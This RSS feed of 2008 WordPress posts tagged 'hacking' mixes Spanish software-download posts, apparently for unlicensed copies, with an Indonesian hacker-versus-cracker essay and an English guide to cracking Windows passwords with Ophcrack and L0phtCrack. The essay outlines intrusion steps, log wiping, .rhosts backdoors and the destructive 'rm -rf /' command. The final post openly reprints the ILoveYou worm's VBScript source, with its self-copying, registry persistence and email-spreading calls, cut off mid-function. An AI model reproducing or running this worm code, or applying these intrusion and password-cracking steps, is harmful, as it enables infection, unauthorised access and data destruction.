<?xml version="1.0" encoding="UTF-8"?><!-- generator="wordpress.com" -->
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	>

<channel>
	<title>hacking &amp;laquo; WordPress.com Tag Feed</title>
	<link>http://wordpress.com/tag/hacking/</link>
	<description>Feed of posts on WordPress.com tagged "hacking"</description>
	<pubDate>Sun, 06 Jul 2008 06:58:16 +0000</pubDate>

	<generator>http://wordpress.com/tags/</generator>
	<language>en</language>

<item>
<title><![CDATA[VirtualBox 1.6.2]]></title>
<link>http://th3xin0s.wordpress.com/?p=34</link>
<pubDate>Sun, 06 Jul 2008 05:52:37 +0000</pubDate>
<dc:creator>th3xin0s</dc:creator>
<guid>http://th3xin0s.wordpress.com/?p=34</guid>
<description><![CDATA[
“Un sistema operativo nuevo e independiente dentro de tu PC”
¿Quieres probar un programa pero ]]></description>
<content:encoded><![CDATA[<p><img class="aligncenter" src="http://img68.imageshack.us/img68/237/4vistajr3.jpg" alt="se" width="345" height="282" /></p>
<p style="text-align:center;"><strong>“Un sistema operativo nuevo e independiente dentro de tu PC”</strong></p>
<p style="text-align:center;">¿Quieres probar un programa pero no te atreves por si dañas tu sistema operativo? ¿Te gustaría tener otro sistema operativo pero sin quitar el tuyo? ¿Imaginas probar Windows Vista desde tu XP?</p>
<p style="text-align:center;">Todo esto es posible con VirtualBox, una utilidad gratuita que crea un ordenador virtual dentro del tuyo, con su sistema operativo totalmente independiente.</p>
<p style="text-align:center;">¿Quieres probar un programa pero no te atreves por si dañas tu sistema operativo? ¿Te gustaría tener otro sistema operativo pero sin quitar el tuyo? ¿Imaginas probar Windows Vista desde tu XP?</p>
<p style="text-align:center;">Todo esto es posible con VirtualBox, una utilidad gratuita que crea un ordenador virtual dentro del tuyo, con su sistema operativo totalmente independiente.</p>
<p style="text-align:center;">De esta forma, podrás crear 'máquinas virtuales' con diferentes sistemas operativos y así tener a tu disposición un Windows 95, un Vista, un 2000 un XP o incluso un Linux. Todo desde tu sistema operativo actual.</p>
<p style="text-align:center;">Para utilizarlo, primero deberás conseguir o crear tu mismo una máquina virtual del sistema operativo que desees, después, cargarla con el programa y listo, arrancará como si de un nuevo sistema operativo se tratase. Por cierto, el programa no ocupa demasiado, pero ten presente que las máquinas virtuales suelen ocupar bastante espacio, fácilmente de cuatro a seis gigabytes.<br />
VirtualBox soporta los siguientes formatos:</p>
<p style="text-align:center;">Sistemas operativos virtuales: Windows (98, NT 4.0, 2000, XP, Server 2003, Vista), DOS/Windows 3.x, Linux (Kernel 2.4 y 2.6), FreeBSD/OpenBSD, Solaris 10, OS/2, etc.<br />
Nota sobre VirtualBox:</p>
<p style="text-align:center;">Para moverte entre la máquina virtual y tu sistema operativo pulsa la tecla Control (CTRL) de la derecha de tu teclado<br />
Para utilizar VirtualBox necesitas:</p>
<p style="text-align:center;">* Sistema operativo: Win2000/NT/XP/2003/Vista</p>
<p style="text-align:center;">
<p style="text-align:center;">
<p style="text-align:center;"><strong><a href="http://rs160.rapidshare.com/files/121334200/VirtualBox-1.6.2-Win_x86.msi">DESCARGAR</a></strong></p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[]]></title>
<link>http://th3xin0s.wordpress.com/?p=33</link>
<pubDate>Sun, 06 Jul 2008 05:23:57 +0000</pubDate>
<dc:creator>th3xin0s</dc:creator>
<guid>http://th3xin0s.wordpress.com/?p=33</guid>
<description><![CDATA[
Wi-Fi Defense es una aplicación que va adquiriendo popularidad a pasos agigantados, ya que cada d]]></description>
<content:encoded><![CDATA[<p style="text-align:center;"><img class="aligncenter" src="http://img355.imageshack.us/img355/1120/51dqgnp4vwlsl500aa280mn2.jpg" alt="sx" /></p>
<p style="text-align:center;">Wi-Fi Defense es una aplicación que va adquiriendo popularidad a pasos agigantados, ya que cada día son más frecuentes las redes inalámbricas. Su propósito es informar de cualquier intrusión no autorizada en nuestra red, una circunstancia muy habitual en tanto que buena parte de las Wi-Fi no cuentan con la protección adecuada (en la mayoría de los casos, por simple desconocimiento del modus operandi de los protocolos 802.11b/g).</p>
<p style="text-align:center;"><a href="http://rapidshare.com/files/121165282/Wi-fi_Defense_V1.0.21.rar">DESCARGAME</a></p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[Libreria DLL XP]]></title>
<link>http://th3xin0s.wordpress.com/?p=32</link>
<pubDate>Sun, 06 Jul 2008 05:09:18 +0000</pubDate>
<dc:creator>th3xin0s</dc:creator>
<guid>http://th3xin0s.wordpress.com/?p=32</guid>
<description><![CDATA[
Actualizado a Junio 2008
Con esta completa libreria dll podras evitar restauraciones de sistema e r]]></description>
<content:encoded><![CDATA[<p style="text-align:center;"><img class="aligncenter" src="http://img382.imageshack.us/img382/993/wlibzs5.jpg" alt="tx" /></p>
<p style="text-align:center;">Actualizado a Junio 2008<br />
Con esta completa libreria dll podras evitar restauraciones de sistema e reinstalaciones de programas y aplicaciones</p>
<p style="text-align:center;">¿Tu ordenador no deja de informarte errores al abrir aplicaciones?</p>
<p style="text-align:center;">¿Ventanas  de Windows diciendo: “DLL File missing”?</p>
<p style="text-align:center;">¿Te planteas formatear?</p>
<p style="text-align:center;">Esta completa libreria te evitará llevar a cabo eso</p>
<p style="text-align:center;">Solo ejecuta el setup y todas las dll de windows xp quedaran restauradas.</p>
<p style="text-align:center;"><a href="http://rapidshare.com/files/126979391/Libreria_dll_XP-x-caleta.com.rar">DESCARGA AKA</a></p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[Malwarebytes Anti-Malware 1.19 Full]]></title>
<link>http://th3xin0s.wordpress.com/?p=31</link>
<pubDate>Sun, 06 Jul 2008 04:57:05 +0000</pubDate>
<dc:creator>th3xin0s</dc:creator>
<guid>http://th3xin0s.wordpress.com/?p=31</guid>
<description><![CDATA[
Malwarebytes Anti Malware escanea los discos y dispositivos de tu ordenador en busca de todo tipo d]]></description>
<content:encoded><![CDATA[<p><img src="http://img391.imageshack.us/img391/9976/3cuarjpgbw8.png" alt="Ls" /></p>
<p style="text-align:center;">Malwarebytes Anti Malware escanea los discos y dispositivos de tu ordenador en busca de todo tipo de malware, y lo elimina.<br />
Puede funcionar como sistema de busqueda de malware de antivirus que No sean<br />
Kaspersky, Bitdefender, ZoneAlarm<br />
Ya que estos no interactuan bajo ningun concepto con el programa<br />
Malwarebytes Anti Malware ofrece dos tipos de análisis. El rápido y el completo, para un análisis en profundidad.</p>
<p style="text-align:center;">Esta aplicación actualiza automáticamente la lista de malware y puede programarse para analizar el PC a una hora determinada. Cuenta además con una lista para los ficheros en cuarentena y otra para los que se deben ignorar.</p>
<p style="text-align:center;">Malwarebytes' Anti-Malware incluye Fileassassin, que es una herramienta que garantiza la eliminación de cualquier archivo infectado.</p>
<p style="text-align:center;">Este programa proporciona porque se realiza a posteriori de la infección, sin embargo, existe la posibilidad de activar la versión protección en tiempo real, que es de pago.</p>
<p style="text-align:center;">
<p style="text-align:center;"><strong><a href="http://www.megaupload.com/?d=GTTZ2OVD">DESCARGAR</a></strong></p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[Hacker atau Cracker?]]></title>
<link>http://emboech.wordpress.com/?p=37</link>
<pubDate>Sun, 06 Jul 2008 04:17:45 +0000</pubDate>
<dc:creator>emboech</dc:creator>
<guid>http://emboech.wordpress.com/?p=37</guid>
<description><![CDATA[   


Komunitas Underground? Bawah tanah? …
Betul, komunitas yang tidak terlihat, tidak terdeteksi]]></description>
<content:encoded><![CDATA[<p><!-- ======================================================= --> <!-- Created by AbiWord, a free, Open Source wordprocessor.  --> <!-- For more information visit http://www.abisource.com.    --> <!-- ======================================================= --></p>
<div>
<p style="text-align:center;" dir="ltr">
<p style="text-align:left;" dir="ltr"><span style="font-family:'ArialMT';">Komunitas Underground? Bawah tanah? …</span></p>
<p style="text-align:left;" dir="ltr"><span style="font-family:'ArialMT';">Betul, komunitas yang tidak terlihat, tidak terdeteksi, seperti siluman, mereka hidup &#38; berjaya di dunia maya – tanpa terdeteksi oleh pengguna Internet biasa, tak terdeteksi oleh sistem administrator WARNET &#38; ISP.</span></p>
<p style="text-align:left;text-indent:0.5in;" dir="ltr"><span style="font-family:'ArialMT';">Siapakah mereka? – mereka adalah para hacker. Media &#38; stereotype masyarakat membentuk karakter hacker sebagai orang jahat dan suka merusak. Stereotype ABG 15-20 tahunan, yang duduk di belakang komputer berjam-jam, masuk ke sistem dan mendelete, berbelanja menggunakan kartu kredit curian atau menghancurkan apa saja yang bisa mereka hancurkan – “anak” ini dikenal sebagai cracker bukan sebagai hacker.</span></p>
<p style="text-align:left;text-indent:0.5in;" dir="ltr"><span style="font-family:'ArialMT';">Cracker ini yang sering anda dengar di berita / media, mematikan situs web, menghapus data dan membuat kekacauan kemanapun mereka pergi. Hacker yang betul sebenarnya tidak seperti yang ada dalam stereotype banyak orang di atas.</span></p>
<p style="text-align:left;text-indent:0.5in;" dir="ltr"><span style="font-family:'ArialMT';">Hacker sering dianggap sebagai orang jahat yang menyusup ke system keamanan orang lain. INI SALAH BESAR. Mereka itu cracker. Di http://www.whatis.com, cracker di definisikan sebagai “seseorang yang masuk ke system orang lain, biasanya di jaringan komputer, membypass password atau lisensi program komputer, atau secara sengaja melawan keamanan komputer.                                                         Cracker dapat mengerjakan hal ini untuk keuntungan, maksud jahat, atau karena sebab lainnya karena ada tantangan. Beberapa proses pembobolan dilakukan untuk menunjukan kelemahan keamanan sistem”. Berbeda dengan Cracker, Hacker menurut Eric Raymond di definisikan sebagai programmer yang pandai. Sebuah hack yang baik adalah solusi yang cantik kepada masalah programming dan “hacking” adalah proses pembuatan-nya. Ada beberapa karakteristik yang menandakan seseorang adalah hacker, seperti</span></p>
<p style="text-align:left;" dir="ltr"><span style="font-family:'ArialMT';">(1) dia suka belajar detail dari bahasa pemrograman atau system,</span></p>
<p style="text-align:left;" dir="ltr"><span style="font-family:'ArialMT';">(2) dia melakukan pemrograman tidak cuma berteori saja,</span></p>
<p style="text-align:left;" dir="ltr"><span style="font-family:'ArialMT';">(3) dia bisa menghargai, menikmati hasil hacking orang lain,</span></p>
<p style="text-align:left;" dir="ltr"><span style="font-family:'ArialMT';">(4) dia dapat secara cepat belajar pemrogramman, dan</span></p>
<p style="text-align:left;" dir="ltr"><span style="font-family:'ArialMT';">(5) dia ahli dalam bahasa pemrograman tertentu atau sistem tertentu, seperti “UNIX hacker”.</span></p>
<p style="text-align:left;" dir="ltr"><span style="font-family:'ArialMT';"> Proses memperoleh pengakuan di antara sesama hacker tidak lepas dari etika &#38; aturan main dunia underground. Etika ini yang akhirnya akan membedakan antara hacker &#38; cracker, maupun hacker kelas rendahan seperti Lamer &#38; Script Kiddies. Salah satu etika yang berhasil di formulasikan dengan baik ada di buku Hackers: Heroes of the Computer Revolution, yang ditulis oleh Steven Levy 1984, ada enam (6) etika yang perlu di resapi seorang hacker:</span></p>
<p style="text-align:left;margin-left:0.25in;text-indent:-0.25in;" dir="ltr"><span style="font-family:'ArialMT';">1. Akses ke komputer – dan apapun yang akan mengajarkan kepada anda bagaimana dunia ini berjalan / bekerja – harus dilakukan tanpa batas &#38; totalitas.  Selalu mengutamakan pengalaman lapangan!</span></p>
<p style="text-align:left;margin-left:0.25in;text-indent:-0.25in;" dir="ltr"><span style="font-family:'ArialMT';">2. Semua informasi harus bebas, terbuka, transparan, tidak di sembunyikan.</span></p>
<p style="text-align:left;margin-left:0.25in;text-indent:-0.25in;" dir="ltr"><span style="font-family:'ArialMT';">3. Tidak pernah percaya pada otoritas, penguasa – percaya pada desentralisasi.</span></p>
<p style="text-align:left;margin-left:0.25in;text-indent:-0.25in;" dir="ltr"><span style="font-family:'ArialMT';">4. Seorang hacker hanya di nilai dari kemampuan hackingnya, bukan kriteria  buatan seperti gelar, umur, posisi atau suku bangsa.</span></p>
<p style="text-align:left;margin-left:0.25in;text-indent:-0.25in;" dir="ltr"><span style="font-family:'ArialMT';">5. Seorang hacker membuat seni &#38; keindahan di komputer.</span></p>
<p style="text-align:left;margin-left:0.25in;text-indent:-0.25in;" dir="ltr"><span style="font-family:'ArialMT';">6. Komputer dapat mengubah hidup anda menuju yang lebih baik.</span></p>
<p style="text-align:left;" dir="ltr"><span style="font-family:'ArialMT';">Gambaran umum aturan main yang perlu di ikuti seorang hacker seperti di jelaskan oleh Scorpio http://packetstorm.securify.com/docs/hack/ethics/my.code.of.ethics.html, yaitu:</span></p>
<p style="text-align:left;margin-left:0.125in;text-indent:-0.125in;" dir="ltr"><span style="font-family:'ArialMT';">• Di atas segalanya, hormati pengetahuan &#38; kebebasan informasi.</span></p>
<p style="text-align:left;margin-left:0.125in;text-indent:-0.125in;" dir="ltr"><span style="font-family:'ArialMT';">• Memberitahukan sistem administrator akan adanya pelanggaran keamanan / lubang di keamanan yang anda lihat.</span></p>
<p style="text-align:left;margin-left:0.125in;text-indent:-0.125in;" dir="ltr"><span style="font-family:'ArialMT';">• Jangan mengambil keuntungan yang tidak fair dari hack.</span></p>
<p style="text-align:left;margin-left:0.125in;text-indent:-0.125in;" dir="ltr"><span style="font-family:'ArialMT';">• Tidak mendistribusikan &#38; mengumpulkan software bajakan.</span></p>
<p style="text-align:left;margin-left:0.125in;text-indent:-0.125in;" dir="ltr"><span style="font-family:'ArialMT';">• Tidak pernah mengambil resiko yang bodoh – selalu mengetahui kemampuan sendiri.</span></p>
<p style="text-align:left;margin-left:0.125in;text-indent:-0.125in;" dir="ltr"><span style="font-family:'ArialMT';">• Selalu bersedia untuk secara terbuka / bebas / gratis memberitahukan &#38; mengajarkan berbagai informasi &#38; metoda yang diperoleh.</span></p>
<p style="text-align:left;margin-left:0.125in;text-indent:-0.125in;" dir="ltr"><span style="font-family:'ArialMT';">• Tidak pernah meng-hack sebuah sistem untuk mencuri uang.</span></p>
<p style="text-align:left;margin-left:0.125in;text-indent:-0.125in;" dir="ltr"><span style="font-family:'ArialMT';">• Tidak pernah memberikan akses ke seseorang yang akan membuat kerusakan.</span></p>
<p style="text-align:left;margin-left:0.125in;text-indent:-0.125in;" dir="ltr"><span style="font-family:'ArialMT';">• Tidak pernah secara sengaja menghapus &#38; merusak file di komputer yang dihack.</span></p>
<p style="text-align:left;margin-left:0.125in;text-indent:-0.125in;" dir="ltr"><span style="font-family:'ArialMT';">• Hormati mesin yang di hack, dan memperlakukan dia seperti mesin sendiri.</span></p>
<p style="text-align:left;margin-left:0.125in;text-indent:-0.125in;" dir="ltr">
<p style="text-align:left;margin-left:0.125in;text-indent:-0.125in;" dir="ltr"><span style="font-family:'ArialMT';"> Dalam hacker, ada tingkatan atau strata. Yang terendah adalah Lamers atau nama lainnya “wanna-be-hacker”, mereka suka sekali mencuri kartu kredit, tukar-menukar software, dll. Mereka ini ingin menjadi hacker dan melakukan hal-hal di atas. Biasanya, mereka menggunakan Trojan, nuke &#38;DoS. Mereka sering menyombongkan diri di IRC channel atau arena chatting. Mereka hanya mampu sampai di developed kiddie atau script  kiddie saja. </span></p>
<p style="text-align:left;" dir="ltr"><span style="font-family:'ArialMT';"> Developed Kiddie, dua tingkat di atas Lamer – di sebut Kiddie karena kelompok ini masih muda (ABG) &#38; masih sekolah (SMU atau sederajat). Mereka membaca tentang metoda hacking &#38; caranya di berbagai kesempatan. Mereka mencoba berbagai sistem sampai akhirnya berhasil &#38; memproklamirkan kemenangan ke lainnya. Umumnya mereka masih menggunakan Grafik User Interface (GUI) &#38; baru belajar basic dari UNIX, tanpa mampu menemukan lubang kelemahan baru di sistem operasi.</span></p>
<p style="text-align:left;" dir="ltr"><span style="font-family:'ArialMT';"> Script Kiddie, seperti tingkat di atasnya, yaitu developed kiddie, biasanya melakukan aktifitas hacking berbasis pada Grafical User Interface (GUI). Seperti juga Lamers, mereka hanya mempunyai pengetahuan teknis networking yang sangat minimal. Hacking dilakukan menggunakan trojan untuk menakuti &#38; menyusahkan hidup sebagian pengguna Internet.</span></p>
<p style="text-align:left;" dir="ltr"><span style="font-family:'ArialMT';"> Akhirnya, sampai di dua tingkatan tertinggi pada hacker. Yaitu semi elite dan elite. Mereka ini S3-nya hacker. Semi Elite - hacker ini biasanya lebih muda daripada Elite. Mereka juga mempunyai kemampuan &#38; pengetahuan luas tentang komputer. Mereka mengerti tentang system operasi (termasuk lubangnya). Biasanya dilengkapi dengan sejumlah kecil program cukup</span></p>
<p style="text-align:left;" dir="ltr"><span style="font-family:'ArialMT';">untuk mengubah program eksploit. Banyak serangan yang dipublikasi dilakukan oleh hacker kaliber ini, sialnya oleh para Elite mereka sering kali di kategorikan Lamer. </span></p>
<p style="text-align:left;" dir="ltr"><span style="font-family:'ArialMT';">Bagaimana proses hacking dilakukan? Ah ini bagian paling menarik dalam dunia</span></p>
<p style="text-align:left;" dir="ltr"><span style="font-family:'ArialMT';">underground. Ada bermacam-macam teknik hacking, yang paling menyebalkan adalah jika terjadi Denial of Service (DoS) yang menyebabkan server / komputer yang kita gunakan menjadi macet / mati. Terlepas dari masalah menyebalkan, secara umum ada empat (4) langkah sederhana yang biasanya dilakukan, yaitu:</span></p>
<p style="text-align:left;" dir="ltr"><span style="font-family:'ArialMT';">1. Membuka akses ke situs.</span></p>
<p style="text-align:left;" dir="ltr"><span style="font-family:'ArialMT';">2. Hacking root (superuser)</span></p>
<p style="text-align:left;" dir="ltr"><span style="font-family:'ArialMT';">3. Menghilangkan jejak.</span></p>
<p style="text-align:left;" dir="ltr"><span style="font-family:'ArialMT';">4. Membuat backdoor (jalan belakang), untuk masuk di kemudian hari.</span></p>
<p style="text-align:left;" dir="ltr"><span style="font-family:'ArialMT';">Hmmm bagaimana secara singkat lebih jauh proses hacking ini dilakukan? Untuk dapat mengakses ke dalam sebuah situs biasanya melalui beberapa proses terlebih dulu, seperti hal-nya dinas intelejen, kita harus tahu persis segala sesuatu tentang perusahaan &#38; situs yang akan kita masuki, rencana melarikan diri kalau ada apa-apa dsb. Proses intelejen ini dilakukan dalam tiga (3) tahapan besar, yaitu footprinting, scanning &#38; enumeration.</span></p>
<p style="text-align:left;" dir="ltr"><span style="font-family:'ArialMT';">Footprinting untuk mengetahui seberapa besar scope / wilayah serangan bisa dilihat dari berbagai file HTML perusahaan tsb, perintah whois, host, dig, nslookup pada Linux untuk melihat scope host yang perlu di serang / di amankan. Scanning untuk melihat servis apa saja yang ada di mesin-mesin tersebut, topologi jaringan dsb. bisa dilakukan mengunakan perintah ping, traceroute, nmap, strobe, udp_scan, netcat di Linux &#38; terakhir Cheops untuk</span></p>
<p style="text-align:left;" dir="ltr"><span style="font-family:'ArialMT';">melakukan network mapping. Enumeration sistem operasi yang jalan di server target apakah Windows NT/2000/XP/Vista/Linux/ Netware. Program seperti snmputil, enum, dumpsec, showmount, rcpinfo, finger menjadi sangat “handy”.</span></p>
<p style="text-align:left;" dir="ltr"><span style="font-family:'ArialMT';">Setelah proses intelejen di lakukan dengan baik proses serangan dapat mulai dikerjakan.</span></p>
<p style="text-align:left;" dir="ltr"><span style="font-family:'ArialMT';">Seperti kita tahu, umumnya berbagai perusahaan / dotcommers akan menggunakan</span></p>
<p style="text-align:left;" dir="ltr"><span style="font-family:'ArialMT';">Internet untuk :</span></p>
<p style="text-align:left;" dir="ltr"><span style="font-family:'ArialMT';">(1) hosting web server mereka,</span></p>
<p style="text-align:left;" dir="ltr"><span style="font-family:'ArialMT';">(2) komunikasi e-mail dan</span></p>
<p style="text-align:left;" dir="ltr"><span style="font-family:'ArialMT';">(3) memberikan akses web / internet kepada karyawan-nya.</span></p>
<p style="text-align:left;" dir="ltr"><span style="font-family:'ArialMT';">Pemisahan jaringan Internet dan IntraNet umumnya dilakukan dengan menggunakan teknik / software Firewall dan Proxy server. Detail sepuluh (10) besar serangan di Internet bisa dibaca di http://www.sans.org/topten.html. Melihat kondisi penggunaan di atas, kelemahan sistem umumnya dapat di tembus misalnya dengan menembus mailserver external / luar yang digunakan untuk memudahkan akses ke mail keluar dari perusahaan.</span></p>
<p style="text-align:left;" dir="ltr"><span style="font-family:'ArialMT';">Selain itu, dengan menggunakan agressive-SNMP scanner &#38; program yang memaksa SNMP community string dapat mengubah sebuah router menjadi bridge (jembatan) yang kemudian dapat digunakan untuk batu loncatan untuk masuk ke dalam jaringan internal perusahaan (IntraNet).</span></p>
<p style="text-align:left;" dir="ltr"><span style="font-family:'ArialMT';">Agar hacker terlindungi pada saat melakukan serangan, teknik cloacking (penyamaran) dilakukan dengan cara melompat dari mesin yang sebelumnya telah di compromised (ditaklukan) melalui program telnet atau rsh. Pada mesin perantara yang menggunakan Windows serangan dapat dilakukan dengan melompat dari program Wingate / proxy server; dapat melalui unauthenticated SOCKproxy port 1080 atau open Web proxy port 80, 81, 8000, 8080. Daftar WinGate server di maintain oleh CyberArmy di http://www.cyberarmy.com/wingate/.</span></p>
<p style="text-align:left;" dir="ltr"><span style="font-family:'ArialMT';">Langkah selanjutnya, hacker akan mengidentifikasi komponen jaringan yang dipercaya oleh system apa saja. Komponen jaringan tersebut biasanya mesin administrator dan server yang biasanya di anggap paling aman di jaringan. Start dengan check akses &#38; eksport NFS ke berbagai direktori yang kritis seperti /usr/bin, /etc dan /home. Eksploitasi mesin melalui kelemahan Common Gateway Interface (CGI), dengan akses ke file /etc/hosts.allow.</span></p>
<p style="text-align:left;" dir="ltr"><span style="font-family:'ArialMT';">Selanjutnya hacker harus mengidentifikasi komponen jaringan yang lemah dan bisa di taklukan. Hacker bisa mengunakan program di Linux seperti ADMhack, mscan, nmap dan banyak scanner kecil lainnya. Program seperti 'ps' &#38; 'netstat' di buat trojan (ingat cerita kuda troya? dalam cerita klasik yunani kuno) untuk menyembunyikan proses scanning. Bagi hacker yang cukup advanced dapat mengunakan aggressive-SNMP scanning untuk men-scan peralatan dengan SNMP.</span></p>
<p style="text-align:left;" dir="ltr"><span style="font-family:'ArialMT';">Setelah hacker berhasil mengidentifikasi komponen jaringan yang lemah dan bisa ditaklukan, maka hacker akan menjalan program untuk menaklukan program daemon yang lemah di server. Cara paling sederhana menggunakan script kiddies yang tersedia di Internet di http://www.technotronics.com / http://www.hackingexposed.com seperti cgiscan.c, phfscan.c dsb. Program daemon adalah program di server yang biasanya berjalan di belakang layar (sebagai daemon / setan). Keberhasilan menaklukan program daemon ini akan memungkinkan seorang Hacker untuk memperoleh akses sebagai ‘root’ (administrator tertinggi di server). Untuk menghilangkan jejak, seorang hacker biasanya melakukan operasi pembersihan 'clean-up‘ operation dengan cara membersihkan berbagai log file. Program seperti zap, wzap, wted, remove akan membantu. Walaupun simpel text editor seperti vi dapat juga melakukan pekerjaan itu. Jangan lupa menambahkan program 'backdooring' dengan cara</span></p>
<p style="text-align:left;" dir="ltr"><span style="font-family:'ArialMT';">Mengganti file .rhosts di /usr/bin untuk memudahkan akses ke mesin yang di taklukan melalui rsh &#38; csh. Selanjutnya seorang hacker dapat menggunakan mesin yang sudah ditaklukan untuk kepentingannya sendiri, tapi seorang hacker yang baik akan memberitahukan sistem administrator tentang kelemahan sistemnya &#38; tidak akan pernah menjalankan perintah ‘rm –rf / &#38;’.</span></p>
<p style="text-align:left;" dir="ltr"><span style="font-family:'ArialMT';">Oleh karena itu semua mesin &#38; router yang menjalankan misi kritis sebaiknya selalu di periksa keamanannya &#38; di patch oleh software yang lebih baru. Backup menjadi penting sekali terutama pada mesin-mesin yang menjalankan misi kritis supaya terselamatkan dari ulah cracker yang men-disable sistem dengan ‘rm –rf / &#38;’.</span></p>
<p style="text-align:left;" dir="ltr"><span style="font-family:'ArialMT';">Cukup banyak situs di Internet yang bisa menjadi basis pengetahuan underground, beberapa diantara-nya berbahasa Indonesia seperti Kecoa Elektronik </span><a href="http%3a//www.kelektronik.org"><span style="font-family:'ArialMT';">http://www.kelektronik.org</span></a><span style="font-family:'ArialMT';">, Hackerlink </span><a href="http%3a//www.hackerlink.or.id"><span style="font-family:'ArialMT';">http://www.hackerlink.or.id</span></a><span style="font-family:'ArialMT';">, maupun Anti-hackerlink (entah dimana lokasinya). Referensi terbaik mungkin bisa dibaca di berbagai situs di luar negeri seperti </span><a href="http%3a//packetstorm.securify.com"><span style="font-family:'ArialMT';">http://packetstorm.securify.com</span></a><span style="font-family:'ArialMT';">, </span><a href="http%3a//www.hackingexposed.com"><span style="font-family:'ArialMT';">http://www.hackingexposed.com</span></a><span style="font-family:'ArialMT';">,</span></p>
<p style="text-align:left;" dir="ltr"><a href="http%3a//neworder.box.sk"><span style="font-family:'ArialMT';">http://neworder.box.sk</span></a><span style="font-family:'ArialMT';">, </span><a href="http%3a//www.sans.org"><span style="font-family:'ArialMT';">http://www.sans.org</span></a><span style="font-family:'ArialMT';">, </span><a href="http%3a//www.rootshell.com"><span style="font-family:'ArialMT';">http://www.rootshell.com</span></a><span style="font-family:'ArialMT';">.</span></p>
<p style="text-align:left;" dir="ltr">
<p style="text-align:left;" dir="ltr"><span style="font-family:'ArialMT';">Dari </span><a href="mailto:disharmoni81%40gmail.com"><span style="font-style:italic;font-size:11pt;font-family:'Arial-ItalicMT';color:#000080;">disharmoni81@gmail.com</span></a><span style="font-style:italic;font-size:11pt;font-family:'Arial-ItalicMT';color:#000080;">, </span><span style="font-size:11pt;font-family:'Arial-ItalicMT';">dengan sedikit pengubahan</span></p>
<p style="text-align:left;" dir="ltr">
<p style="text-align:left;" dir="ltr">
<p style="text-align:left;" dir="ltr">
</div>
]]></content:encoded>
</item>
<item>
<title><![CDATA[How to crack a Windows password]]></title>
<link>http://empa7hy.wordpress.com/?p=21</link>
<pubDate>Sun, 06 Jul 2008 01:47:31 +0000</pubDate>
<dc:creator>empa7hy</dc:creator>
<guid>http://empa7hy.wordpress.com/?p=21</guid>
<description><![CDATA[There are many ways to crack windows passwords.
1. Ophcrack
Ophcrack is a wonderous lil&#8217; (Huge]]></description>
<content:encoded><![CDATA[<p>There are many ways to crack windows passwords.</p>
<p>1. Ophcrack</p>
<p>Ophcrack is a wonderous lil' (Huge, actually, up to 2 gigs with all rainbow tables, 800 mb is enough, though) program that let's you retrieve user passwords.</p>
<p>There are two versions of Ophcrack.</p>
<p>The Live CD and the regular version, i'll say some advantages of both.</p>
<p>The regular version is more of a hacking your brother/friend/related to computer. Mostly because you have to have an administrator account to crack anything.</p>
<p>The Live Cd is a Linux Distribution (Local) that can store the Windows passwords, so you can crack them later. (This makes it a quick task) It can also crack them at the Live Cd.</p>
<p>Ophcrack can be downloaded <a href="http://ophcrack.sourceforge.net/tables.php">here</a>:</p>
<p>2. L0PHTCrack</p>
<p>L0phtcrack, is another Windows cracking program, the advantages of it are it's small file size. It has the ability to record people logging in (Username and Pass) on the same network. Really a great tool, it has brute-forcing options, the whole shabang.</p>
<p>(I feel I didn't provide enough information on l0phtcrack check out <span class="a">en.wikipedia.org/wiki/<strong>L0phtCrack)</strong></span></p>
<p>It can be downloaded <a href="http://rapidshare.com/files/26761412/LC5.rar">here</a></p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[Virus source codes]]></title>
<link>http://empa7hy.wordpress.com/?p=20</link>
<pubDate>Sun, 06 Jul 2008 00:17:34 +0000</pubDate>
<dc:creator>empa7hy</dc:creator>
<guid>http://empa7hy.wordpress.com/?p=20</guid>
<description><![CDATA[ILoveYou virus: 
Written in VBS:
rem  barok -loveletter(vbe) &lt;i hate go to school&gt;
rem    by: ]]></description>
<content:encoded><![CDATA[<h1 style="text-align:center;"><span style="color:#ff0000;">ILoveYou virus: </span></h1>
<p style="text-align:center;">Written in VBS:</p>
<p>rem  barok -loveletter(vbe) &#60;i hate go to school&#62;<br />
rem    by: spyder  /  ispyder@mail.com  /  @GRAMMERSoft Group  /  Manila,Philippines<br />
On Error Resume Next<br />
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow<br />
eq=""<br />
ctr=0<br />
Set fso = CreateObject("Scripting.FileSystemObject")<br />
set file = fso.OpenTextFile(WScript.ScriptFullname,1)<br />
vbscopy=file.ReadAll<br />
main()</p>
<p>sub main()<br />
On Error Resume Next<br />
dim wscr,rr<br />
set wscr=CreateObject("WScript.Shell")<br />
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")<br />
if (rr&#62;=1) then<br />
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"<br />
end if<br />
Set dirwin = fso.GetSpecialFolder(0)<br />
Set dirsystem = fso.GetSpecialFolder(1)<br />
Set dirtemp = fso.GetSpecialFolder(2)<br />
Set c = fso.GetFile(WScript.ScriptFullName)<br />
c.Copy(dirsystem&#38;"\MSKernel32.vbs")<br />
c.Copy(dirwin&#38;"\Win32DLL.vbs")<br />
c.Copy(dirsystem&#38;"\LOVE-LETTER-FOR-YOU.TXT.vbs")<br />
regruns()<br />
html()<br />
spreadtoemail()<br />
listadriv()<br />
end sub</p>
<p>sub regruns()<br />
On Error Resume Next<br />
Dim num,downread<br />
regcreate<br />
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32",dirsystem&#38;"\MSKernel32.vbs"<br />
regcreate<br />
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL",dirwin&#38;"\Win32DLL.vbs"<br />
downread=""<br />
downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory")<br />
if (downread="") then<br />
downread="c:\"<br />
end if<br />
if (fileexist(dirsystem&#38;"\WinFAT32.exe")=1) then<br />
Randomize<br />
num = Int((4 * Rnd) + 1)<br />
if num = 1 then<br />
